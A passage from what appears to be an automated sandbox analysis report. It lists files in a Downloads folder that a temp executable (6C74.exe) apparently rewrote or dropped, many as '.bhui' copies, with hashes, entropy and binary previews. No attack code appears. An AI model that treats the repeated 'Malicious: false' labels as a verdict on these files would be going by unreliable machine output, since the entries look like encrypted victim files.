MD5:	E1E57111ED012B00C7E6DF94D2F9B9B8
SHA1:	C95C1E45E3F47525A4A105A56C97099074051963
SHA-256:	AC5468BD0D576A3729968937FB1BD9A623774E6BFB702EEF0D094538D94B0D6F
SHA-512:	276F856C4D813B23D87AB10F5201EB098586DF30564A19C3124A4F6DD0FD62A81411526CF6130D60724CD29E038CED1E8A7F61DB32F7A2EA0BDA17ED9A86A711
Malicious:	false
Reputation:	unknown
Preview:	LFOPOr-.`....e.w..G....iT.4..0..Kw(.....^p..M....w.Z........cq.0M.....w.........l.M#.........S....s`.\.i...jM....[.z..BgF.\...ie......h..EMt...4.t.\f..S.O.......!D..3..,...[s...?u..V.K.o.A.^u.....s..g.......#.z...S4...]b.AB .G.g.O[...@...5.d..i.&....4..b~-%ST..1...w..~..V..1\ Z.....%....}.0.G.o...+zH.......h.+...5..W..q...)YJ ..y.......~._.V...vf1..2.....L.r(= ...R.......}q..\.`.6.....e.P..%...W.B.].<K.k.-.@o}...Jd...".Q......Q......vX...V9.....79.X..r.hO<.v[t..[\|G.s}.iE.\|.?N......:.t..fL?.[.nb.f.3..{........X............P.D.,NM.y(..c.q....C.~$D........n.....+}..5.l...9......K0&..V.a.$..b...x.q.{..8B....HL...c..A..l....2....&..)...k..U0S.l.2.jEI).9.k.........0.^.K.C.J....=.5...'.p..A7.~....Z......< .E...1#....]' .G....._]..d....S..p...j...py2...3].f\.........k,..`.....3..x7oV...G\...0....9.6O..:d.4a..{+.A.s./.GG.<..(.%;...C&.R..5..r.....O_.U..%...,.D....U.Oy......ZL..........%}.QVU.S.m..1.PK...P.0.U.b..H.....g...`...@..

C:\Users\user\Downloads\LFOPODGVOH.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8477730696722166
Encrypted:	false
SSDEEP:	24:2l72htmWOBVK8arm0nCc4vr+EdOJdPpSD196+/3xZWrkctHcPVnWbD:2E4BVw7C5+EXD11/BKkM/D
MD5:	E1E57111ED012B00C7E6DF94D2F9B9B8
SHA1:	C95C1E45E3F47525A4A105A56C97099074051963
SHA-256:	AC5468BD0D576A3729968937FB1BD9A623774E6BFB702EEF0D094538D94B0D6F
SHA-512:	276F856C4D813B23D87AB10F5201EB098586DF30564A19C3124A4F6DD0FD62A81411526CF6130D60724CD29E038CED1E8A7F61DB32F7A2EA0BDA17ED9A86A711
Malicious:	false
Reputation:	unknown
Preview:	LFOPOr-.`....e.w..G....iT.4..0..Kw(.....^p..M....w.Z........cq.0M.....w.........l.M#.........S....s`.\.i...jM....[.z..BgF.\...ie......h..EMt...4.t.\f..S.O.......!D..3..,...[s...?u..V.K.o.A.^u.....s..g.......#.z...S4...]b.AB .G.g.O[...@...5.d..i.&....4..b~-%ST..1...w..~..V..1\ Z.....%....}.0.G.o...+zH.......h.+...5..W..q...)YJ ..y.......~._.V...vf1..2.....L.r(= ...R.......}q..\.`.6.....e.P..%...W.B.].<K.k.-.@o}...Jd...".Q......Q......vX...V9.....79.X..r.hO<.v[t..[\|G.s}.iE.\|.?N......:.t..fL?.[.nb.f.3..{........X............P.D.,NM.y(..c.q....C.~$D........n.....+}..5.l...9......K0&..V.a.$..b...x.q.{..8B....HL...c..A..l....2....&..)...k..U0S.l.2.jEI).9.k.........0.^.K.C.J....=.5...'.p..A7.~....Z......< .E...1#....]' .G....._]..d....S..p...j...py2...3].f\.........k,..`.....3..x7oV...G\...0....9.6O..:d.4a..{+.A.s./.GG.<..(.%;...C&.R..5..r.....O_.U..%...,.D....U.Oy......ZL..........%}.QVU.S.m..1.PK...P.0.U.b..H.....g...`...@..

C:\Users\user\Downloads\LHEPQPGEWF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858083064710402
Encrypted:	false
SSDEEP:	24:9L4p2GlBWgLPelrnkh0frzVhOPe+0ijKLIB5/s+nAQ9WbD:9L4p2GlYvrni0frbl+Bfk+nED
MD5:	E7D25A43B471EB53AEE0AE4E708A93D0
SHA1:	C71E3154761716A1D85150DFA5AD986599CF1E18
SHA-256:	59375CB3700209CEE1743E55EA2190AE70201EB192D508F95F3EFAC82FB42703
SHA-512:	741F5BBFEC5A53A61E958AADC6E84FB4770CA6AFD01CB95156BC502A409A0AE0FED76006745C0968C2483456655A99341A112ED9858C4329C85CE2CDDD0934DC
Malicious:	false
Reputation:	unknown
Preview:	LHEPQS.].$@.....y...^...Bs!}..y?Q..A...D ....q.i...'.....7..c51._......^.h3.\.7..N9..~.....!..>..S..@...7....'". ..$.x#<.......E...o.CCg..\.[...fo.#j]StK..q..U...,U`u.1z.G.....3...4..^..B.$..~.vv^.J.'.....t...[...R-.........i>...3..~....5..M./..0VN.B:....cUU...:_O76.....%../T.#.j1.HCg@od..%....:.d.~....Y....Qz.^rI.!!.x_Z.6I.Y........Da"...Nx.a,K.....g\......g..6'..... ....Ye.D@/...Y...0%..h..I.bt.F.....V.........i.!M......k.=.i3...a..U6...1E....x..a..{.h........5.1....~.wx"..n.f9...1"~......m......S..]...E..+.....?....&.&....@T...#.....x>....+\..\<{..`.T.to~{.........R.;..+.A.6......Hb.=....a.D.....S.....+.....x.......)f.PU.....y...d..,<8P.4MYl_.X-...\.u..,$.H..k....^...0.2-....Fr^...}...y%J.i.x......vq8.w.i...cqG.K...v).P..j./FWG...tX.LR...$.......].}=.5#@..[3.bGRw..1.............K.F&A.'...h..l...9,.5?.N.[...K....t.....G..X......,.WsvT/..U..L.?-./k.}D.jt._...ho-Q.a.`e.3cY..z..E?.~..~..O .....sB..'.\Er~e..A..B.H..m9 .....n..9E.b.6..y(c

C:\Users\user\Downloads\LHEPQPGEWF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858083064710402
Encrypted:	false
SSDEEP:	24:9L4p2GlBWgLPelrnkh0frzVhOPe+0ijKLIB5/s+nAQ9WbD:9L4p2GlYvrni0frbl+Bfk+nED
MD5:	E7D25A43B471EB53AEE0AE4E708A93D0
SHA1:	C71E3154761716A1D85150DFA5AD986599CF1E18
SHA-256:	59375CB3700209CEE1743E55EA2190AE70201EB192D508F95F3EFAC82FB42703
SHA-512:	741F5BBFEC5A53A61E958AADC6E84FB4770CA6AFD01CB95156BC502A409A0AE0FED76006745C0968C2483456655A99341A112ED9858C4329C85CE2CDDD0934DC
Malicious:	false
Reputation:	unknown
Preview:	LHEPQS.].$@.....y...^...Bs!}..y?Q..A...D ....q.i...'.....7..c51._......^.h3.\.7..N9..~.....!..>..S..@...7....'". ..$.x#<.......E...o.CCg..\.[...fo.#j]StK..q..U...,U`u.1z.G.....3...4..^..B.$..~.vv^.J.'.....t...[...R-.........i>...3..~....5..M./..0VN.B:....cUU...:_O76.....%../T.#.j1.HCg@od..%....:.d.~....Y....Qz.^rI.!!.x_Z.6I.Y........Da"...Nx.a,K.....g\......g..6'..... ....Ye.D@/...Y...0%..h..I.bt.F.....V.........i.!M......k.=.i3...a..U6...1E....x..a..{.h........5.1....~.wx"..n.f9...1"~......m......S..]...E..+.....?....&.&....@T...#.....x>....+\..\<{..`.T.to~{.........R.;..+.A.6......Hb.=....a.D.....S.....+.....x.......)f.PU.....y...d..,<8P.4MYl_.X-...\.u..,$.H..k....^...0.2-....Fr^...}...y%J.i.x......vq8.w.i...cqG.K...v).P..j./FWG...tX.LR...$.......].}=.5#@..[3.bGRw..1.............K.F&A.'...h..l...9,.5?.N.[...K....t.....G..X......,.WsvT/..U..L.?-./k.}D.jt._...ho-Q.a.`e.3cY..z..E?.~..~..O .....sB..'.\Er~e..A..B.H..m9 .....n..9E.b.6..y(c

C:\Users\user\Downloads\LIJDSFKJZG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8650514529754965
Encrypted:	false
SSDEEP:	24:Q3PnziaIhwfZ1buPLrFhklewAcxmwtP+OVrRmVe3MaMVPnFXVyFb/tyOW6nqKkBf:Q3r6hi1Q/FhklxAcxHDR3MVp6OD
MD5:	68ECBDD371FD480552E75BBE169ED34E
SHA1:	BCE258DF9E7F10889A78EF01B9ADFC938A81A104
SHA-256:	6E361AAD80E0AE6832D041ECD33DAF587AD9B87E9818771AF914E3465E9BB47B
SHA-512:	AAC1ABCFEC3745685E9E9C34505F66F9D0AB71E2BDD8B579C080A4CE8508205EB59062877C14DC1F1C1780EA47F06050B9BED279FB9192D79F04599ECA525565
Malicious:	false
Reputation:	unknown
Preview:	LIJDS...A.....WvF.J.K.....C...H....O.X.....2....y..H.L.....Fi..9.F..O.8..WU.p.@.p.y..+_e7d..s...#...N......Z....n.sF2'......#M.g.ZA..g....c.....s...k.y...qo%.-....}.6...Y.0.o2.T.'M.........<...@Z...........aO..K.Tf1...9.#.$@.%nKq..<TnQ.T<.{.nR.z....$'0w4wU3...H.@.{....pI.0?.a.....R...gi........2.....6 ...C....#...sg,X!...(W.S...o/.4#.. &..g..@...../...$..d]R..+./..F.%....S..M.4.Ir..T.[..Hw.Ss....#E"'[.0.."..5>^.M%.......=J>u.6.h..}.~_.$f.#.;C..p...H..n %.hwb.h.:.A.Z...c\.y.5.)8.T.j....b{18.q...@4...&J.........>..L...z...px..=s3.l.m.{...o.D4.G......S.).P..r.....E.#}..G.^.y..#.V%h...&....3F$I3g:........?.f...t'e/.....eu.....%r........K....}..m...R..A....ML.k...Nv\|....3gG..q....lf.O..eD.....tV. ...'.y.(C.1kC...z.X.R...8.....!m.h..9?...gH..W..{.D..#.59X....JML..K+i...vv..?.)..bI.o...P.....VR.K.v.A....p..x.N.0.3...j...0......n....>TY.....[..{.....0........Y.....+@...........oX.......\R.50u.l..q/._.e.Q.9....+=..S..\|J.F@.z.,...N.".p..`z...#

C:\Users\user\Downloads\LIJDSFKJZG.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8650514529754965
Encrypted:	false
SSDEEP:	24:Q3PnziaIhwfZ1buPLrFhklewAcxmwtP+OVrRmVe3MaMVPnFXVyFb/tyOW6nqKkBf:Q3r6hi1Q/FhklxAcxHDR3MVp6OD
MD5:	68ECBDD371FD480552E75BBE169ED34E
SHA1:	BCE258DF9E7F10889A78EF01B9ADFC938A81A104
SHA-256:	6E361AAD80E0AE6832D041ECD33DAF587AD9B87E9818771AF914E3465E9BB47B
SHA-512:	AAC1ABCFEC3745685E9E9C34505F66F9D0AB71E2BDD8B579C080A4CE8508205EB59062877C14DC1F1C1780EA47F06050B9BED279FB9192D79F04599ECA525565
Malicious:	false
Reputation:	unknown
Preview:	LIJDS...A.....WvF.J.K.....C...H....O.X.....2....y..H.L.....Fi..9.F..O.8..WU.p.@.p.y..+_e7d..s...#...N......Z....n.sF2'......#M.g.ZA..g....c.....s...k.y...qo%.-....}.6...Y.0.o2.T.'M.........<...@Z...........aO..K.Tf1...9.#.$@.%nKq..<TnQ.T<.{.nR.z....$'0w4wU3...H.@.{....pI.0?.a.....R...gi........2.....6 ...C....#...sg,X!...(W.S...o/.4#.. &..g..@...../...$..d]R..+./..F.%....S..M.4.Ir..T.[..Hw.Ss....#E"'[.0.."..5>^.M%.......=J>u.6.h..}.~_.$f.#.;C..p...H..n %.hwb.h.:.A.Z...c\.y.5.)8.T.j....b{18.q...@4...&J.........>..L...z...px..=s3.l.m.{...o.D4.G......S.).P..r.....E.#}..G.^.y..#.V%h...&....3F$I3g:........?.f...t'e/.....eu.....%r........K....}..m...R..A....ML.k...Nv\|....3gG..q....lf.O..eD.....tV. ...'.y.(C.1kC...z.X.R...8.....!m.h..9?...gH..W..{.D..#.59X....JML..K+i...vv..?.)..bI.o...P.....VR.K.v.A....p..x.N.0.3...j...0......n....>TY.....[..{.....0........Y.....+@...........oX.......\R.50u.l..q/._.e.Q.9....+=..S..\|J.F@.z.,...N.".p..`z...#

C:\Users\user\Downloads\NIRMEKAMZH.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830496478430552
Encrypted:	false
SSDEEP:	24:0Wkn3e+kzgXFSkpI2L8At4H+TolWPQf3qaQNa5vt91fAGN4+rnfrGcf3SxOryWbD:09kukkpI2L8k4H+UlWYlOal9/4+r/vS0
MD5:	60C0C58165A7BAE292A0EDA7CEA527D5
SHA1:	A2276026AD7A3B421B40375788EFE199F1764CFD
SHA-256:	5454680EA969E82145ECBCCCA7BCB10CF30B18987964FF48B8D3678ABD3243A2
SHA-512:	E5B6E422162AB8D8C3E4E1C7724DAC43BFD068E11157778B9FEAB87DC22F06B26B59D12C3AB7F727C4EEAD05220FC14100D8E029C40F52763BA9D2819DBE3DCB
Malicious:	false
Reputation:	unknown
Preview:	NIRME..g.!...[{..o.k0.r.v..gBQ+L....=:...E..}.q1"e=................}w...ln".-..v'..........\|70....Fk..... 6a%.`.......2QP.k{^....d5.C...k.i......n.Q..f..6.R.A....M.1<p.C.[.....].1.9...C.}uip...[(j.]x.d12.c.a.D.Y...._.1g.6`Ay......-...d..,....{.k%..u..5.!N.R.......B........>...k...P...Lk...f.$%..9...P..e....U..+.."...q\|p......u.E...A..onvMH...8gA}...fy.......o.X.`..T..~.].[4J....c3..p...S.jQZ.................6......'...C.....>f.......i.~.f.S.wm{.VF.q.9h..>#..A..4.n.........W....i ....=.p9v..$X8...y.k4....(..le..H..q..N4h..s.3...F......2...\|...V..!..<.!.......4..!............Y...7.1.\|.N ...v=..%....g...5.......U..F....).:...m...O..P.D"....tc%.#v....R....9..RR..K46..D.Y9.I...7c...C^B7xX....\|....i.....5.""....;Y...g..`1..%-.......z.wn...Un.z&c....b97.S....b....GDS...<U..8...{i.. M.4M_..pU..D6....~".Q.....P....w7-........u,..y......^6..G...F>...(.~\.&........cM....4h.h.)Ox..}H.].<}......\v."b.>b.....\|.N=(,..B.@...\|.,-..xS.]u.7..Q...x.g.U..C.m...

C:\Users\user\Downloads\NIRMEKAMZH.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830496478430552
Encrypted:	false
SSDEEP:	24:0Wkn3e+kzgXFSkpI2L8At4H+TolWPQf3qaQNa5vt91fAGN4+rnfrGcf3SxOryWbD:09kukkpI2L8k4H+UlWYlOal9/4+r/vS0
MD5:	60C0C58165A7BAE292A0EDA7CEA527D5
SHA1:	A2276026AD7A3B421B40375788EFE199F1764CFD
SHA-256:	5454680EA969E82145ECBCCCA7BCB10CF30B18987964FF48B8D3678ABD3243A2
SHA-512:	E5B6E422162AB8D8C3E4E1C7724DAC43BFD068E11157778B9FEAB87DC22F06B26B59D12C3AB7F727C4EEAD05220FC14100D8E029C40F52763BA9D2819DBE3DCB
Malicious:	false
Reputation:	unknown
Preview:	NIRME..g.!...[{..o.k0.r.v..gBQ+L....=:...E..}.q1"e=................}w...ln".-..v'..........\|70....Fk..... 6a%.`.......2QP.k{^....d5.C...k.i......n.Q..f..6.R.A....M.1<p.C.[.....].1.9...C.}uip...[(j.]x.d12.c.a.D.Y...._.1g.6`Ay......-...d..,....{.k%..u..5.!N.R.......B........>...k...P...Lk...f.$%..9...P..e....U..+.."...q\|p......u.E...A..onvMH...8gA}...fy.......o.X.`..T..~.].[4J....c3..p...S.jQZ.................6......'...C.....>f.......i.~.f.S.wm{.VF.q.9h..>#..A..4.n.........W....i ....=.p9v..$X8...y.k4....(..le..H..q..N4h..s.3...F......2...\|...V..!..<.!.......4..!............Y...7.1.\|.N ...v=..%....g...5.......U..F....).:...m...O..P.D"....tc%.#v....R....9..RR..K46..D.Y9.I...7c...C^B7xX....\|....i.....5.""....;Y...g..`1..%-.......z.wn...Un.z&c....b97.S....b....GDS...<U..8...{i.. M.4M_..pU..D6....~".Q.....P....w7-........u,..y......^6..G...F>...(.~\.&........cM....4h.h.)Ox..}H.].<}......\v."b.>b.....\|.N=(,..B.@...\|.,-..xS.]u.7..Q...x.g.U..C.m...

C:\Users\user\Downloads\NWCXBPIUYI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833117511606193
Encrypted:	false
SSDEEP:	24:V0k6Ki5R9deG6w7oseiIuWmomqBBbK7ln+jSSef0bpLehjWw99LpYgzz0Gg4YrWX:VDlaRvLoseTMoLBBbc/SRd4jWw99Lfz7
MD5:	2E9744BA8EAA65397F085B6E9B9631D5
SHA1:	070CDEE1368D2421A9553551ADC788FD65B5E4A3
SHA-256:	E038D224D2FF1205635E944172AC113991121B6D0051775D8F77143003602597
SHA-512:	8B4653E0284FE10605E4ECD602B192F162C834DA13E36723336A937FC4329371895EF52AEF5EF8A2E4148539B2731A6ECF5B7E213DD4CAA441F27F56E76D5B26
Malicious:	false
Reputation:	unknown
Preview:	NWCXBD.."._.qfNK..2f[.U.3U.O..o .U.E.`[...u.}...8-...Kb..C.D..i.D.T.7...>..cL..2...l............u.....D..g.kR.[..!.....x..j...N.)L.#..'..o0......F......v.O...)....>...Y.l.V.......%..=<.\|.L.......f.#.}.&E..A..oR..GJo.=#.....w.\k..'...j..;7...--?......U3...mH$Oijs.R.#/p..~.J.Wn=......Q.9..w..H.q.1...&...\|..f.=.a....,......+.'..?............O... m.7@..B"8X<.?.8...&.R.p3rs7ij:...:..LG.#.H!4..^B.c...H.Z..P9(...$...`Vm.....s..4q.....,.kH.bq.....Eh"f2..X_.......3.T .}....).../....!...$......)...Fg.i.s.q_Il..RO........gX...(../......S..(.1e........m...902si+7.s..J^........n.Z......0.$.%A...FF#^..1..{....C..,..b.4.^....4\.t..]-.......7....^5...N...`$.a.*.(1.:....(...7...0u..b................i."F.....Q...CO...UZ-.gi...xU..._.0x}...L.9e^J.."=No....aD.../......"e!.2O...XGH..f]y{..p.L.y.{.s..b.....w..B.....l..6.~..o..........0...z.V..XSu...M.....=PoQ..L2j...{.,.<9P.2..m.M(S...M.]..c%..mW....Q.E.~'..f}U..&..d-.F...y-1.cC....-.5.bBI...=.m

C:\Users\user\Downloads\NWCXBPIUYI.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833117511606193
Encrypted:	false
SSDEEP:	24:V0k6Ki5R9deG6w7oseiIuWmomqBBbK7ln+jSSef0bpLehjWw99LpYgzz0Gg4YrWX:VDlaRvLoseTMoLBBbc/SRd4jWw99Lfz7
MD5:	2E9744BA8EAA65397F085B6E9B9631D5
SHA1:	070CDEE1368D2421A9553551ADC788FD65B5E4A3
SHA-256:	E038D224D2FF1205635E944172AC113991121B6D0051775D8F77143003602597
SHA-512:	8B4653E0284FE10605E4ECD602B192F162C834DA13E36723336A937FC4329371895EF52AEF5EF8A2E4148539B2731A6ECF5B7E213DD4CAA441F27F56E76D5B26
Malicious:	false
Reputation:	unknown
Preview:	NWCXBD.."._.qfNK..2f[.U.3U.O..o .U.E.`[...u.}...8-...Kb..C.D..i.D.T.7...>..cL..2...l............u.....D..g.kR.[..!.....x..j...N.)L.#..'..o0......F......v.O...)....>...Y.l.V.......%..=<.\|.L.......f.#.}.&E..A..oR..GJo.=#.....w.\k..'...j..;7...--?......U3...mH$Oijs.R.#/p..~.J.Wn=......Q.9..w..H.q.1...&...\|..f.=.a....,......+.'..?............O... m.7@..B"8X<.?.8...&.R.p3rs7ij:...:..LG.#.H!4..^B.c...H.Z..P9(...$...`Vm.....s..4q.....,.kH.bq.....Eh"f2..X_.......3.T .}....).../....!...$......)...Fg.i.s.q_Il..RO........gX...(../......S..(.1e........m...902si+7.s..J^........n.Z......0.$.%A...FF#^..1..{....C..,..b.4.^....4\.t..]-.......7....^5...N...`$.a.*.(1.:....(...7...0u..b................i."F.....Q...CO...UZ-.gi...xU..._.0x}...L.9e^J.."=No....aD.../......"e!.2O...XGH..f]y{..p.L.y.{.s..b.....w..B.....l..6.~..o..........0...z.V..XSu...M.....=PoQ..L2j...{.,.<9P.2..m.M(S...M.]..c%..mW....Q.E.~'..f}U..&..d-.F...y-1.cC....-.5.bBI...=.m

C:\Users\user\Downloads\NWCXBPIUYI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861396821743541
Encrypted:	false
SSDEEP:	24:u6KqgFZoQmLv1FtNFcYLTKAG6Y4dBbSoGbHcCSlu0c6/feKZDRCjofQf+wi7oWbD:u/qg1mr1NLTKAicB2Sl72KBgeQs7tD
MD5:	884A430F430CEECE59D02AE18042304C
SHA1:	7CC9E11ECF189D7A2BF0E8A093DFD9CF7CA7C53C
SHA-256:	EB23DD8DF5B8669E8221369FEDDE3FEEA5BC657CDB7BF90451E714777A61EF5B
SHA-512:	C40D58267134415673BC76706A6759EEBA80BD6458D1C9FB33243721E1FDAD2EDEA3FC05AB53CD4C9623503FEC29A5E99D7A1C5D8F64F19213C5486EC34529F9
Malicious:	false
Reputation:	unknown
Preview:	NWCXB].w...1....J..L.`n.u.....v..$.J...9.}&x%.....Pg...e.........~.Kb.W...!Mup'[.gK1....ag(C...L.za;..Qx...$ ..t...!.;.......PP.....E....{.6......<.Q.C{..cV.>.......C^':..l...2!.Cp.!.28.`:u..62>.$m.Rv.I..@\|..G.h..V..o)....H..L......[.......S...).X....;R...........?.....{YY....6.FV.;+=.]7%Jf1.$.w'7E.s8...}IACa.8.L.a...m..k.....iSC."]6>#&..a.....ac&YF.`..\.hlR...kz...1.7....j!../.p.....K..-.......I......WVC...p.\|Q..........G....C.".....%I\....hzb./q...B.z<.......e.%..L....H4.,...b.d!..:.H..f9.....Q!\|z\.pI......WL.,....@.C..@...m9B~H...J,..&.2...#..".O#.e.(.{....K.5..+x,.H0L&....\|T..Z.u~......%0.v..=.N....dE.-.J..-SZ.g...-.65C[?Oen.3=......=..S(..k.../..~:`.qbl@...Hd....C..`.=.....m.g..8Z,y.(..n..(F"QK..CN...^.e?..!?K..[#%..P.)c...u.>.\|l.B...S...uA.../>...$o......5.......8i......q...-..2..ZN..[OjG.8..f.N.OV.A..qU....&....`H.8y..&H^.!..8..V..<.N.....3.sPx.E.+.ct.R...=!3..#........R...H..n......;...!.c.~.H..w!.m...e.\.....y.[..

C:\Users\user\Downloads\NWCXBPIUYI.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861396821743541
Encrypted:	false
SSDEEP:	24:u6KqgFZoQmLv1FtNFcYLTKAG6Y4dBbSoGbHcCSlu0c6/feKZDRCjofQf+wi7oWbD:u/qg1mr1NLTKAicB2Sl72KBgeQs7tD
MD5:	884A430F430CEECE59D02AE18042304C
SHA1:	7CC9E11ECF189D7A2BF0E8A093DFD9CF7CA7C53C
SHA-256:	EB23DD8DF5B8669E8221369FEDDE3FEEA5BC657CDB7BF90451E714777A61EF5B
SHA-512:	C40D58267134415673BC76706A6759EEBA80BD6458D1C9FB33243721E1FDAD2EDEA3FC05AB53CD4C9623503FEC29A5E99D7A1C5D8F64F19213C5486EC34529F9
Malicious:	false
Reputation:	unknown
Preview:	NWCXB].w...1....J..L.`n.u.....v..$.J...9.}&x%.....Pg...e.........~.Kb.W...!Mup'[.gK1....ag(C...L.za;..Qx...$ ..t...!.;.......PP.....E....{.6......<.Q.C{..cV.>.......C^':..l...2!.Cp.!.28.`:u..62>.$m.Rv.I..@\|..G.h..V..o)....H..L......[.......S...).X....;R...........?.....{YY....6.FV.;+=.]7%Jf1.$.w'7E.s8...}IACa.8.L.a...m..k.....iSC."]6>#&..a.....ac&YF.`..\.hlR...kz...1.7....j!../.p.....K..-.......I......WVC...p.\|Q..........G....C.".....%I\....hzb./q...B.z<.......e.%..L....H4.,...b.d!..:.H..f9.....Q!\|z\.pI......WL.,....@.C..@...m9B~H...J,..&.2...#..".O#.e.(.{....K.5..+x,.H0L&....\|T..Z.u~......%0.v..=.N....dE.-.J..-SZ.g...-.65C[?Oen.3=......=..S(..k.../..~:`.qbl@...Hd....C..`.=.....m.g..8Z,y.(..n..(F"QK..CN...^.e?..!?K..[#%..P.)c...u.>.\|l.B...S...uA.../>...$o......5.......8i......q...-..2..ZN..[OjG.8..f.N.OV.A..qU....&....`H.8y..&H^.!..8..V..<.N.....3.sPx.E.+.ct.R...=!3..#........R...H..n......;...!.c.~.H..w!.m...e.\.....y.[..

C:\Users\user\Downloads\NWCXBPIUYI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843446682788314
Encrypted:	false
SSDEEP:	24:RrPw+BACTzKHFO1sKtKbwzfBnwN/wEZkgjTnslWbD:RPwwzNsKtQKVwN4lEDsiD
MD5:	AAF5C10D905CF63D31625BA7B289D637
SHA1:	E3F821DA806E216CC7007CE902C47B8F590A19FD
SHA-256:	4435519E69F088DF8B0948F6E65F75C5F9BB64451036447C40A267B0B02831DE
SHA-512:	C4FE9977ACA2A5A5C43789DF61F4D49AC708C4DE6AF0846E221838955A146E0463055ED5D9FE8419954801CF72C1784A6E800A261937187DBFCDD989A9D6ADDA
Malicious:	false
Reputation:	unknown
Preview:	NWCXB.T..#:. .....:..1GF.HA.=r~A.......N.......9..~.R.....3.......4.. R;.q$i......Dr.G.h...........c.sNWTO....g..u..J.~..ld..o....Z..G...({.y=N.......d4'IUg...\|..u......_a....\.....R..N.... .q?m...>`@..Q.{.o...v")'..../...._..2...1...._.{...F..X...4O.J.?"...m,].'.l....o.Q......6Z=..p.<.l......u....V./.W.K..2&.>..c.$9...4.r.M.UA...==...E..0.z..[q....^...8PT....D.....\|DO.....R-...1eQiI"Z.."...{.`.....+.j............#Rb.V~k........)d#Q..)....n=.......g....u ?...v\|vy..E...4.....&.t.7.-.7.\|...>.O....$J.........V[..I..ZDg.R`K.b..."(.G.._.U.P.".`....K...........s..Er@.KY3....ml.....\|TL....kn.d...St.._.....,.!......y....1..Eq...d.v.P=C.kc.....]..O......).J..~.....b....AJ.Z.u>.Y..(...Pm..Dj.b...3DO.Y.G6.I{..s..s..+.i.....r'.....T.^.Xo..g..F...Q...X.9&. ....c....M.....#...\l6vN..e%T..y..}..y.....4.,.:.o....P...Au...Mr8.q).~3;....3O.s.o.@.1.4...r...o].;JR...cW........K,0,K.!.In..D.:.3..7....1..Q....0~@.).......j..eX[..H.7(.....i....}...6..>%.

C:\Users\user\Downloads\NWCXBPIUYI.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843446682788314
Encrypted:	false
SSDEEP:	24:RrPw+BACTzKHFO1sKtKbwzfBnwN/wEZkgjTnslWbD:RPwwzNsKtQKVwN4lEDsiD
MD5:	AAF5C10D905CF63D31625BA7B289D637
SHA1:	E3F821DA806E216CC7007CE902C47B8F590A19FD
SHA-256:	4435519E69F088DF8B0948F6E65F75C5F9BB64451036447C40A267B0B02831DE
SHA-512:	C4FE9977ACA2A5A5C43789DF61F4D49AC708C4DE6AF0846E221838955A146E0463055ED5D9FE8419954801CF72C1784A6E800A261937187DBFCDD989A9D6ADDA
Malicious:	false
Reputation:	unknown
Preview:	NWCXB.T..#:. .....:..1GF.HA.=r~A.......N.......9..~.R.....3.......4.. R;.q$i......Dr.G.h...........c.sNWTO....g..u..J.~..ld..o....Z..G...({.y=N.......d4'IUg...\|..u......_a....\.....R..N.... .q?m...>`@..Q.{.o...v")'..../...._..2...1...._.{...F..X...4O.J.?"...m,].'.l....o.Q......6Z=..p.<.l......u....V./.W.K..2&.>..c.$9...4.r.M.UA...==...E..0.z..[q....^...8PT....D.....\|DO.....R-...1eQiI"Z.."...{.`.....+.j............#Rb.V~k........)d#Q..)....n=.......g....u ?...v\|vy..E...4.....&.t.7.-.7.\|...>.O....$J.........V[..I..ZDg.R`K.b..."(.G.._.U.P.".`....K...........s..Er@.KY3....ml.....\|TL....kn.d...St.._.....,.!......y....1..Eq...d.v.P=C.kc.....]..O......).J..~.....b....AJ.Z.u>.Y..(...Pm..Dj.b...3DO.Y.G6.I{..s..s..+.i.....r'.....T.^.Xo..g..F...Q...X.9&. ....c....M.....#...\l6vN..e%T..y..}..y.....4.,.:.o....P...Au...Mr8.q).~3;....3O.s.o.@.1.4...r...o].;JR...cW........K,0,K.!.In..D.:.3..7....1..Q....0~@.).......j..eX[..H.7(.....i....}...6..>%.

C:\Users\user\Downloads\NYMMPCEIMA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839391894670972
Encrypted:	false
SSDEEP:	24:RkD2JGX0sF0un7U3H6k9qK2TZJBsZ1tLQqHRQVLOK5rMdlW1bX4ZY82YQ8/WbD:7a0Zu7rkc1TZJBsHNjRQVLvKMEm+mD
MD5:	38A4D17E34864A0743C2FAC61B0818AE
SHA1:	8AE3A25A91B0FA4DA7388A6AF512B35FDC17F275
SHA-256:	8CE1A16B8CC12C30FD0A7FE1FB6867BA945266927990FF2AE06EE0D9A77D0444
